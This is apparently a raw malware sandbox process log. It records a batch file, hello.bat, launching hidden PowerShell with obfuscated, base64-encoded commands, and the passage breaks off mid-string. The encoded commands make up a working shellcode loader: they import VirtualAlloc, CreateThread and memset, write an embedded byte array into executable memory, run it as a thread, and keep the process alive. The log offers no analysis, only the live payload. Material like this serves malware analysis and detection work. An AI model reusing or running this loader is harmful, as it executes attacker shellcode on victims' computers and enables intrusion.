AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA=
3⤵
PID:5608

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAGYAQQBqACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWQBmAEEAagAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAMQAzACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAMQBlACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYgAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAA3AGEALAAwAHgAMABlACwAMAB4ADIAMwAsADAAeAAxADQALAAwAHgAOAAyACwAMAB4AGMAZgAsADAAeAA1AGMALAAwAHgAOQBjACwAMAB4ADYANwAsADAAeABmAGUALAAwAHgANABlACwAMAB4AGYAYQAsADAAeABlAGMALAAwAHgANQAzACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADUAZgAsADAAeAAxADQALAAwAHgAZABjACwAMAB4ADUAMAAsADAAeABlAGIALAAwAHgANQA4ACwAMAB4AGMAOQAsADAAeAA2ADkALAAwAHgAMQA0ACwAMAB4ADkAMwAsADAAeABiAGUALAAwAHgAYwAzACwAMAB4AGMAYwAsADAAeAA5AGQALAAwAHgAMAAwACwAMAB4ADcAZgAsADAAeAAyAGMALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADEAZgAsADAAeAAzAGMALAAwAHgANABlACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeAAxADIALAAwAHgAYQBlACwAMAB4ADUAZgAsADAAeAA1ADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeAA2ADEALAAwAHgAYgAzACwAMAB4ADMAMQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZAA2ACwAMAB4AGQANgAsADAAeABlADcALAAwAHgANAAzACwAMAB4ADAANwAsADAAeAA5AGQALAAwAHgAYQAwACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAMgA5ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgA2ACwAMAB4AGYAZQAsADAAeAAxAGMALAAwAHgAYgAyACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAMgBlACwAMAB4AGIAYgAsADAAeAAyADQALAAwAHgAYgA2ACwAMAB4ADYANAAsADAAeABjADgALAAwAHgAYgA2ACwAMAB4ADEAZQAsADAAeABiADUALAAwAHgAMABlACwAMAB4ADcAOQAsADAAeAA1ADEALAAwAHgAYgBiACwAMAB4ADIAMgAsADAAeAA3AGIALAAwAHgAYQA5ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgAMAA5ACwAMAB4AGMAMQAsADAAeABmAGUALAAwAHgANgA3ACwAMAB4ADAAYQAsADAAeAAxADIALAAwAHgANwBjACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4ADIANgAsADAAeAAzADAALAAwAHgAMAA3ACwAMAB4ADYAMgAsADAAeABkADYALAAwAHgAOQA1ACwAMAB4AGQAZQAsADAAeABlADEALAAwAHgAZAA0ACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYQBlACwAMAB4AGYAOAAsADAAeAA2ADUALAAwAHgANwA5ACwAMAB4AGMANQAsADAAeAAwADUALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABjACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4AGQANAAsADAAeAA2AGYALAAwAHgAYwAyACwAMAB4ADkANwAsADAAeABiADAALAAwAHgAZABlACwAMAB4AGYAYgAsADAAeABjADgALAAwAHgAMQBkACwAMAB4AGIAZgAsADAAeAA1ADkALAAwAHgAOAAyACwAMAB4ADgAYwAsADAAeABkADYALAAwAHgAZABlACwAMAB4ADYAYgAsADAAeAA0AGYALAAwAHgAZAA3ACwAMAB4ADgAMgAsADAAeABmAGIALAAwAHgAOAAzACwAMAB4ADEANQAsADAAeAAzAGQALAAwAHgAZgBjACwAMAB4ADgAYgAsADAAeAAyAGUALAAwAHgANABlACwAMAB4AGMAZQAsADAAeAAxADQALAAwAHgAOAA0ACwAMAB4AGQAOAAsADAAeAA2ADIALAAwAHgAZABjACwAMAB4ADAAMgAsADAAeAAxAGUALAAwAHgAZgAyACwAMAB4AGMAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGIAYwAsADAAeAA5AGIALAAwAHgANAA4ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAYgAyACwAMAB4ADgAZQAsADAAeABhADUALAAwAHgAZQBjACwAMAB4AGEAYwAsADAAeAAyADcALAAwAHgAYwA2ACwAMAB4ADYANgAsADAAeAAyAGQALAAwAHgAYwA4ACwAMAB4ADEAMwAsADAAeAAxADIALAAwAHgAMgA3ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANABiACwAMAB4ADYAZgAsADAAeAAxAGUALAAwAHgAMwA0ACwAMAB4ADgAZQAsADAAeAA5ADAALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAAwADcALAAwAHgANwA2ACwAMAB4ADcAMgAsADAAeABkADEALAAwAHgANAA4ACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgAOAAxACwAMAB4ADIAOAAsADAAeAA5ADcALAAwAHgAZABhACwAMAB4AGMAYgAsADAAeABhADYALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABmADMALAAwAHgANgBjACwAMAB4ADYAMQAsADAAeAA5ADAALAAwAHgAMQBiACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADgANQAsADAAeAA0ADAALAAwAHgAOQAxACwAMAB4AGEAZAAsADAAeAA0AGEALAAwAHgANQBmACwAMAB4AGQAZgAsADAAeABlAGQALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeAAxAGYALAAwAHgAYQAzACwAMAB4ADIAMQAsADAAeAAxADgALAAwAHgAMwAzACwAMAB4ADUAMwAsADAAeABjADIALAAwAHgANQA3ACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgAZABkACwAMAB4ADQAZAAsADAAeAAwADQALAAwAHgAZgA5ACwAMAB4ADQAYgAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4AGEAZQAsADAAeABlADMALAAwAHgANwAwACwAMAB4AGYANgAsADAAeAA5ADgALAAwAHgAYQBiACwAMAB4ADgAYgAsADAAeABkAGQALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAxAGUALAAwAHgAOQBlACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAAwAGIALAAwAHgAZABkACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgANgAzACwAMAB4AGIAOQAsADAAeABmAGMALAAwAHgANABjACwAMAB4ADkANgAsADAAeABjADYALAAwAHgAMgA4ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgANQAzACwAMAB4AGQAMwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYANAAsADAAeABiAGIALAAwAHgANQBlACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgANgA0ACwAMAB4AGEAMAAsADAAeAAwADIALAAwAHgAYwAyACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgANgBhACwAMAB4AGIAMAAsADAAeABiADAALAAwAHgANABiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAGYAbQB5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABVAGYAbQB5AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABVAGYAbQB5ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
4⤵
PID:6444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\12mu3tqw\12mu3tqw.cmdline"
5⤵
PID:6968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES373F.tmp" "c:\Users\Admin\AppData\Local\Temp\12mu3tqw\CSCBDB53E10DEF4E809618820AD08A0.TMP"
6⤵
PID:6192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\hello.bat"
1⤵
PID:6180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv lI -;sv mJz ec;sv qgU ((gv lI).value.toString()+(gv mJz).value.toString());powershell (gv qgU).value.toString() 'JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA='"
2⤵
PID:6208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwA